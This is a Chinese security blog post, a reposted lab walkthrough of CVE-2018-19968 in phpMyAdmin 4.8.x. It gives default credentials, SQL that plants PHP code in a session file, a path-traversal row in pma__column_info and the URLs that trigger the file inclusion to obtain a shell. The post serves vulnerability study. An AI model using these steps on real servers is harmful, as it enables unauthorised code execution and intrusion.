CVE-2018-19968 phpmyadmin文件包含getshell连载(完结)

最新推荐文章于 2021-12-31 16:31:16 发布
最新推荐文章于 2021-12-31 16:31:16 发布
阅读量300 收藏 1
点赞数
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45447309/article/details/106949327
版权

这是phpmyadmin系列渗透思路的第三篇文章,前面一篇文章阐述了通过文件包含getshell,本文将通过另一个CVE文件包含漏洞继续展开讨论

原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13169447.html

 

#001 环境搭建

在线环境:https://www.vsplate.com/?github=vulnspy/phpmyadmin-4.8.1

也可以选择自行到phpmyadmin官网下载对应版本

 

#002 漏洞复现

1、首先登陆进后台,这里默认是root,toor

 

2、漏洞利用思路

创建数据库,并将PHP代码写入SESSION文件中

CREATE DATABASE foo;
CREATE TABLE foo.bar ( baz VARCHAR(100) PRIMARY KEY );
INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>';

访问http://target/com/chk_rel.php?fixall_pmadb=1&db=foo在数据库foo中生成phpMyAdmin的配置表。

 

将篡改后的Transformation数据插入表pma__columninfo中将sess_***中的***替换成你的会话ID,即COOKIE中phpMyAdmin的值,抓包查看session id,如下

执行:

INSERT INTO pma__column_info SELECT '1', 'foo', 'bar', 'baz', 'plop', 'plop', 'plop', 'plop', '../../../../../../../../tmp/sess_***','plop';
#将sess_***中的***替换成你的会话ID,即COOKIE中phpMyAdmin的值

 

然后访问

http://target.com/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1

就能自动包含刚才插入数据库表的恶意代码

phpmyadmin系列的渗透思路文章到此就完结了,本篇文章篇幅较短,思路也是之前没阐述过的,之后将会更新其他文章,敬请期待...

m0s30
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2018-19968 (phpMyAdmin任意文件包含/远程代码执行漏洞)
ranqi666的博客
04-25 988
前言 Transformation是phpMyAdmin中的一个高级功能,通过Transformation可以对每个字段的内容使用不同的转换,每个字段中的内容将被预定义的规则所转换。比如我们有一个存有文件名的字段 ‘Filename’,正常情况下 phpMyAdmin 只会将路径显示出来。但是通过Transformation我们可以将该字段转换成超链接,我们就能直接在 phpMyAdmin 中点击...
phpMyAdmin Transformation 任意文件包含漏洞 (需登录PMASA-2018-6/CVE-2018-19968)
蜡笔小新说安全的博客
06-23 311
phpMyAdmin Transformation 任意文件包含漏洞 (需登录) 2018年12月07日 phpMyAdmin 发布安全公告PMASA-2018-6修复了一个由Transformation特性引起的本地文件读取漏洞,影响4.8.0~4.8.3版本,CVE编号CVE-2018-19968。 这是一个需要登陆利用的漏洞,首先需要实现登陆,在已只用户名和密码的情况下我们先登陆查看查看网页情况,先实现手工注入再编写exp脚本,我们实验的是一个已经搭建好的靶机地址为: 靶机 登陆后查看 第一步:创
CVE-2018-12613 phpmyadmin文件包含getshell连载(三)
PANDA墨森的博客
06-24 637
这是phpmyadmin系列渗透思路的第三篇文章,前面一篇文章阐述了通过慢查询日志getshell,本文将通过文件包含漏洞展开讨论 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13164349.html #001 影响版本 Phpmyadmin 4.8.0/4.8.0.1/4.8.1 #002 漏洞验证利用 http://www.xxx.com/index.php?target=db_sql.php%253f/../../../../../../e.
phpMyAdmin 4.8.1后台文件包含漏洞Getshell的几种姿势
qq_45521281的博客
04-27 2396
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程文件包含漏洞。 受影响版本: phpMyAdmin 4.8.0和4.8.1受到影响。 登陆phpmyadmin后台: 访问 http://192.168.0.13...
爬虫 web登录 CVE-2018-19968
椰奶冻不安全的博客
06-22 821
安全脚本开发 目标 以CVE-2018-19968为例,写exp,一键getshell 所需工具: python / burp,可选 pycharm / ipython 1. 简单爬虫 python requests库 指定汉字的笔划动图下载 2. web登录 3. CVE-2018-19968 手动利用 phpMyAdmin文件包含 4. 编写exp 登录 执行SQL 文件包含写入webshell 目录 一、简单爬虫 二、Web登录 三、CVE-2018-19968 四、编写exp
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
K8 weblogic-CVE-2018-2628-getshell
07-16
【K8 weblogic-CVE-2018-2628-getshell】是一个针对Oracle WebLogic Server的渗透测试工具,主要用于检验系统是否存在CVE-2018-2628漏洞并利用该漏洞获取shell权限。这个工具的使用应该严格限制在合法的安全测试环境...
weblogic10.36 CVE-2018-2893补丁文件
08-02
weblogic10.36 CVE-2018-2893补丁文件 最新补丁文件,修复 WebLogic(CVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞...
cve-2018-2628 exp getshell
05-21
【标题】"CVE-2018-2628 EXP Getshell" 是一个与网络安全相关的主题,涉及到了一个特定的漏洞利用(Exploit)和获取远程 shell 的技术。CVE(Common Vulnerabilities and Exposures)是用于识别安全漏洞的全球唯一...
【WEB安全】PHPMyAdmin后台GetShell姿势总结
网络安全知识分享
12-31 4738
PHPMyAdmin后台GetShell姿势总结前言:本地环境:数据库文件导出写入利用条件利用方式数据库全局日志写入利用条件利用方式数据库慢查询日志写入利用条件利用方式CVE-2018-12613利用条件利用方式CVE-2018-19968利用条件利用方式 前言: phpMyAdmin是一个以PHP为基础,以web方式架构在服务器上的MySQL的数据库管理工具。让管理者可以通过Web接口来管理MySQL数据库。因其基于Web的简便易操作的图形化界面备受网站管理者的喜爱。 当我们通过其它各类手段获取到MySQ
CVE-2018-12613 PhpMyadmin后台文件包含分析
热门推荐
3569
06-27 1万+
2018年6月19日,phpmyadmin在最新版本修复了一个严重级别的漏洞.描述:一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外:$ cfg ['AllowArbitraryServer'] = true:攻击者可以指定他/她已经控制...
修复web生产平台项目下的漏洞修复(CVE-2018-19518、CVE-2018-19935、CVE-2017-9798)
向技术大牛致敬
03-27 6592
漏洞信息: University of Washington IMAP Toolkit 2007f 命令注入漏洞(CVE-2018-19518) PHP 安全漏洞(CVE-2018-19935) Apache HTTP Server 安全漏洞(CVE-2017-9798)【原理扫描】 漏洞说明: University of Washington IMAP Toolkit 2007f...
CVE-2018-2025(winrar远程代码执行漏洞)
simple___sunny的博客
03-13 2354
漏洞背景: 2019 年 2 月 20 日 Check Point团队爆出了一个关于WinRAR存在19年的漏洞,用它来可以获得受害者计算机的控制。攻击者只需利用此漏洞构造恶意的压缩文件,当受害者使用WinRAR解压该恶意文件时便会触发漏洞。 WinRAR 代码执行相关的 CVE 编号如下: CVE-2018-20250, CVE-2018-20251, CVE-2018-2025...
CVE-2018-4878的复现
大方子
10-07 4318
前言: CVE-2018-4878利用flash的漏洞来进行攻击,如果受害者的flash版本在28.0.0.137及其之前,那么攻击者可以通过诱使受害者点击链接访问特定网页来控制受害者的电脑。 1 漏洞影响范围 Flash Player28.0.0.137及以前的所有版本 2 漏洞复现 2.1 测试环境 攻击机:kali2017 靶机:win7_x64+IE8+FLASH_playe...
CVE-2018-10933 身份验证绕过漏洞验证
锋刃科技的博客
10-28 6872
0x00 事件背景 2018-10-16 libssh发布更新公告旨在解决CVE-2018-10933的问题 libssh版本0.6及更高版本在服务端代码中具有身份验证绕过漏洞。 通过向服务端提供SSH2_MSG_USERAUTH_SUCCESS消息来代替服务端期望启动身份验证的 SSH2_MSG_USERAUTH_REQUEST消息,攻击者可以在没有任何凭据的情况下成功进行身份验证。 进而可...
Joomla注入漏洞(CVE-2018-6605)复现分析
3569
04-18 2432
https://mp.weixin.qq.com/s?__biz=MzAxODg1MDMwOQ==&amp;mid=2247489109&amp;idx=1&amp;sn=0c9a3388e4ac1389897b4449fb3af110&amp;chksm=9bcea13facb928293ac06fede04f15d564b60a5e8ad26208f28ebe175017aa3d2144617...
CVE-2018-7600 Drupal漏洞原理的简单分析与复现
锋刃科技的博客
11-12 8381
0x00组件背景 Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。 0x01漏洞位置 这里有个call_user_func_array call_user_func_array函数是调用第一个参数的函数 传入的参数数第二个参数数...
windows zookeeper的cve-2018-8012的补丁文件放哪
最新发布
09-08
Windows ZooKeeper的CVE-2018-8012漏洞的补丁文件应该放在ZooKeeper的安装目录中。具体而言,可以按照以下步骤进行操作: 1. 打开ZooKeeper的安装目录。默认情况下,ZooKeeper的安装目录通常位于C:\Program Files\...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值